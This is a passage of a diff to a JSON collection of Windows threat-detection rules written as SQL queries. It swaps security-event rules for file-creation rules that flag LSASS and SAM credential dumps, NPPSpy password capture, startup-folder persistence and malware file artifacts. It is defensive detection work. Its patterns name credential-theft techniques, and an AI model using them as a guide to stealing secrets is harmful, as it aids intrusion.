to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", - "author": "Pushkarev Dmitry", + "description": "A General detection for files being created in the Windows startup directory. 
This could be an indicator of persistence.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.lateral_movement", - "attack.t1021.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Valid user was not added to RDP group" + "FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4825')" - ], - "filename": "win_security_not_allowed_rdp_access.yml" - }, - { - "title": "CVE-2023-23397 Exploitation Attempt", - "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", - "status": "experimental", - "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", - "author": "Robert Lee @quantum_cookie", - "tags": [ - "attack.credential_access", - "attack.initial_access", - "cve.2023.23397" - ], - "falsepositives": [ - "Searchprotocolhost.exe likes to query these registry keys. 
To avoid false postives, it's better to filter out those events before they reach the SIEM" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp%' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" + "filename": "file_event_win_startup_folder_file_write.yml" }, { - "title": "DPAPI Domain Master Key Backup Attempt", - "id": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", + "title": "Suspicious Desktopimgdownldr Target File", + "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", "status": "test", - "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.defense_evasion", + "attack.t1105" ], "falsepositives": [ - "If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event." 
+ "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4692')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" ], - "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml" + "filename": "file_event_win_susp_desktopimgdownldr_file.yml" }, { - "title": "Active Directory User Backdoors", - "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "status": "test", - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "author": "@neu5ron", + "title": "WerFault LSASS Process Memory Dump", + "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "status": "experimental", + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1098", - "attack.persistence" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 
'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" ], - "filename": "win_security_alert_ad_user_backdoors.yml" + "filename": "file_event_win_lsass_werfault_dump.yml" }, { - "title": "SCM Database Handle Failure", - "id": "13addce7-47b2-4ca0-a98f-1de964d1d669", + "title": "Potential SAM Database Dump", + "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "status": "experimental", - "description": "Detects non-system users failing to get a handle of the SCM database.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1010" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Rare cases of administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4656' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'ServicesActive' AND AccessMask = '0xf003f') AND NOT (SubjectLogonId = '0x3e4'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE 
'%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\'))" ], - "filename": "win_security_scm_database_handle_failure.yml" + "filename": "file_event_win_sam_dump.yml" }, { - "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", - "id": "2c99737c-585d-4431-b61a-c911d86ff32f", + "title": "Suspicious File Created Via OneNote Application", + "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", "status": "experimental", - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion" ], "falsepositives": [ - "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + "False positives should be very low with the extensions list cited. 
Especially if you don't heavily utilize OneNote.", + "Occasional FPs might occur if OneNote is used internally to share different embedded documents" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" ], - "filename": "win_security_account_backdoor_dcsync_rights.yml" + "filename": "file_event_win_office_onenote_susp_dropped_files.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Security", - "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "title": "Windows Binaries Write Suspicious Extensions", + "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - 
"tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects windows executables that writes files with suspicious extensions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" + "filename": 
"file_event_win_shell_write_susp_files_extensions.yml" }, { - "title": "SCM Database Privileged Operation", - "id": "dae8171c-5ec6-4396-b210-8466585b53e9", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", + "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", "status": "test", - "description": "Detects non-system users performing privileged operation os the SCM database", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4674' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'servicesactive' AND PrivilegeList = 'SeTakeOwnershipPrivilege') AND NOT (SubjectLogonId = '0x3e4' AND ProcessName LIKE '%:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename 
LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\')" ], - "filename": "win_security_scm_database_privileged_operation.yml" + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Failed Logon From Public IP", - "id": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", + "title": "Adwind RAT / JRAT File Artifact", + "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", "status": "test", - "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", - "author": "NVISO", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.t1078", - "attack.t1190", - "attack.t1133" - ], - "falsepositives": [ - "Legitimate logon attempts over the internet", - "IPv4-to-IPv6 mapped IPs" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND NOT ((IpAddress LIKE '%-%' ESCAPE '\\') OR ((IpAddress LIKE '10.%' ESCAPE '\\' OR IpAddress LIKE '192.168.%' ESCAPE '\\' OR IpAddress LIKE '172.16.%' ESCAPE '\\' OR IpAddress LIKE '172.17.%' ESCAPE '\\' OR IpAddress LIKE '172.18.%' ESCAPE '\\' OR IpAddress LIKE '172.19.%' ESCAPE '\\' OR IpAddress LIKE '172.20.%' ESCAPE '\\' OR IpAddress LIKE '172.21.%' ESCAPE '\\' OR IpAddress LIKE '172.22.%' ESCAPE '\\' OR IpAddress LIKE '172.23.%' ESCAPE '\\' OR IpAddress LIKE '172.24.%' ESCAPE '\\' OR IpAddress LIKE '172.25.%' ESCAPE '\\' OR IpAddress LIKE '172.26.%' ESCAPE '\\' OR IpAddress LIKE '172.27.%' ESCAPE '\\' OR 
IpAddress LIKE '172.28.%' ESCAPE '\\' OR IpAddress LIKE '172.29.%' ESCAPE '\\' OR IpAddress LIKE '172.30.%' ESCAPE '\\' OR IpAddress LIKE '172.31.%' ESCAPE '\\' OR IpAddress LIKE '127.%' ESCAPE '\\' OR IpAddress LIKE '169.254.%' ESCAPE '\\')) OR (IpAddress = '::1' OR (IpAddress LIKE 'fe80::%' ESCAPE '\\' OR IpAddress LIKE 'fc00::%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "win_security_susp_failed_logon_source.yml" + "filename": "file_event_win_mal_adwind.yml" }, { - "title": "Device Installation Blocked", - "id": "c9eb55c3-b468-40ab-9089-db2862e42137", + "title": "Creation of an Executable by an Executable", + "id": "297afac9-5d02-4138-8c58-b977bac60556", "status": "experimental", - "description": "Detects an installation of a device that is forbidden by the system policy", + "description": "Detects the creation of an executable by another executable", "author": "frack113", - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '6423')" - ], - "filename": "win_security_device_installation_blocked.yml" - }, - { - "title": "Password Dumper Activity on LSASS", - "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "status": "test", - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "author": "sigma", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" - ], - "filename": "win_security_susp_lsass_dump.yml" - 
}, - { - "title": "Successful Overpass the Hash Attempt", - "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", - "status": "test", - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Runas command-line tool using /netonly parameter" + "Software installers", + "Update utilities", + "32bit applications launching their 64bit versions" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%.exe' ESCAPE '\\' AND TargetFilename LIKE '%.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\cleanmgr.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\dxgiadaptercache.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\Dism.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%:\\\\WUDownloadCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WindowsUpdateBox.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND NewProcessName LIKE 
'%\\\\WindowsUpdateBox.Exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\Microsoft\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Squirrel.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\SquirrelTemp\\\\tempb\\\\' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\assembly\\\\NativeImages\\_%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.vscode\\\\extensions\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\SquirrelTemp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_overpass_the_hash.yml" + "filename": "file_event_win_susp_dropper.yml" }, { - "title": "New or Renamed User Account with 
'$' in Attribute 'SamAccountName'", - "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", + "title": "NPPSpy Hacktool Usage", + "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", "status": "test", - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "author": "Ilyas Ochkov, oscd.community", + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\')" ], - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" + "filename": "file_event_win_hktl_nppspy.yml" }, { - "title": "Ngrok Usage with Remote Desktop Service", - "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", - "status": "experimental", - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", - "author": "Florian Roth (Nextron Systems)", + "title": "LSASS Memory Dump File Creation", + "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", + "status": "test", + "description": "LSASS memory dump creation using operating systems utilities. 
Procdump will use process name in output file if no name is specified", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" ], - "filename": "win_terminalservices_rdp_ngrok.yml" + "filename": "file_event_win_lsass_memory_dump_file_creation.yml" }, { - "title": "New Firewall Rule Added In Windows Firewall Exception List", - "id": "cde0a575-7d3d-4a49-9817-b8004a7bf105", + "title": "Potential Binary Or Script Dropper Via PowerShell.EXE", + "id": "7047d730-036f-4f40-b9d8-1c63e36d5e62", "status": "experimental", - "description": "Detects when a rule has been added to the Windows Firewall exception list", + "description": "Detects PowerShell creating a binary executable or script file.", "author": "frack113", - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2004' AND NOT ((Action = '2') OR ((ApplicationPath LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ApplicationPath LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\Setup.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ModifyingApplication LIKE 
'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\dllhost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "tags": [ + "attack.persistence" ], - "filename": "win_firewall_as_add_rule.yml" - }, - { - "title": "New Firewall Exception Rule Added For A Suspicious Folder", - "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", - "status": "experimental", - "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", - "author": "frack113", "falsepositives": [ - "Any legitimate application that runs from the AppData user directory" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2') OR ((ApplicationPath LIKE '%AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' OR ApplicationPath LIKE 